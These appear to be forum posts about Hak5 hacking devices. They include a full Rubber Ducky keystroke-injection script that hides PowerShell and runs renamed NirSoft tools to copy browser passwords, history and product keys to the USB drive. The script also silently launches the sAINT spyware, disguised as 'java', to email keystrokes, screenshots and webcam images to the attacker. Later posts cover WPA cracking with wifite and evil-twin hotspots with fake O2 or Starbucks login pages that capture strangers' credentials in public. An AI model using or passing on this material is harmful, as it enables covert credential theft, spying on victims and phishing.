W1L5T3R

Standing on the shoulders of giants on this one :) shout out to them This will do the following: 1. Move the powershell dialogue (small size) to the bottom of the screen 2. steal all browser passwords and dump them onto the rubber ducky 3. steal all browser history and dump them onto the rubber ducky 4. steal product keys and dump them onto the rubber ducky (everything installed which needs a product key it will dump) 5. silently install sAINT and then dump keystrokes, screenshot and webcam snap to your email (disguised as java and not detected) All of this from plugging in the rubber duck to removing is within 10 seconds. I just adjusted the coding a little and got it running quickly and silently. to make sAINT work - use a linux machine (kali or parrot or whatever) and download sAINT and compile the .exe... rename the .exe to whatever you like and store on the rubber ducky. download browser history, browser password viewer and product key viewer from here: https://www.nirsoft.net/ rename them to whatever you like and use encoder to make the inject.bin here is a copy of the script: DELAY 300 REM CLOSES ALL WINDOWS THAT ARE OPEN GUI d DELAY 200 REM OPEN RUN BOX GUI r DELAY 100 REM OPENS POWERSHELL STRING powershell.exe DELAY 100 ENTER DELAY 100 REM CHANGES TERMINAL TO SMALL BOX STRING MODE CON:COLS=18 LINES=1 DELAY 100 ENTER DELAY 100 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM SETS THE PATH FOR THE USB DRIVE AND CHANGES LABEL TO _ (underscore) STRING $usbPath = GET-WMIObject Win32_Volume | ? { $_.label -eq '_' } | select name ENTER DELAY 100 REM CD INTO USB DRIVE STRING cd $usbPath.name ENTER REM RUNS BROWSER PASS STEALER SILENTLY AND STORES TEXT FILE ON USB STRING ./WinUpdate1 /stext win1log.txt <<<<<<renamed to WinUpdate1>>>>>> DELAY 100 ENTER REM RUNS BROWSER HISTORY STEALER SILENTLY AND STORES IT ON USB DRIVE AS TEXT FILE STRING ./WinUpdate2 /stext win2log.txt <<<<<<<renamed to WinUpdate2>>>>> DELAY 100 ENTER REM RUNS PRODUCT KEY STEALER SILENTLY AND STORES IT ON USB DRIVE AS TEXT FILE STRING ./PKV /stext pkvlog.txt <<<<<<renamed to PKV>>>>>> DELAY 100 ENTER DELAY 200 REM RUNS SAINT LOGGER SILENTLY AND REPORTS TO YOUR EMAIL SCREENSHOT AND KEYSTROKES PLUS WEBCAM SNAP STRING ./java <<<<<I renamed the sAint.exe to java>>>>> DELAY 100 ENTER STRING exit ENTER

Managed to get WPA working on the tetra and pineapple, but it doesn't like the options added to the attack in the options panel. I just installed wifite on both of them and SSH into and works flawless. Portable and does the job I need.

Google is your friends for 'cough' pre made portals. Search Kali portals and you will be surprised what's available for download.

The SD card ... just symlink the modules from SD to root using the ln -s command in terminal, creates a link and sorts out the problems.. if SD don't mount on boot, just take it out and put it back in (example: ln -s target_path link_path

I have the nano and the tetra.. The tetra sits on my desk or attached to a long range USB antenna beside the window for more range. Now if you have the nano, lot's of fun to be had. Just set it up and watch the games begin ;) if you are good with html5 and php then you can create phishing pages that capture logins from anywhere... in simple terms, make a page like 02, starbucks and things like that and the nano is portable so carry it with you, power it up and leave it while you eat a burger. The victim will connect to your spoofed hotspot and then get re-directed to your fake page... then game over! :P then ssh into your nano from your phone or use the management AP and check logs from the GUI and view the logs for usernames and passwords that try to connect to the fake wifi portal or login page of you choice. The choices are endless if you use your imagination.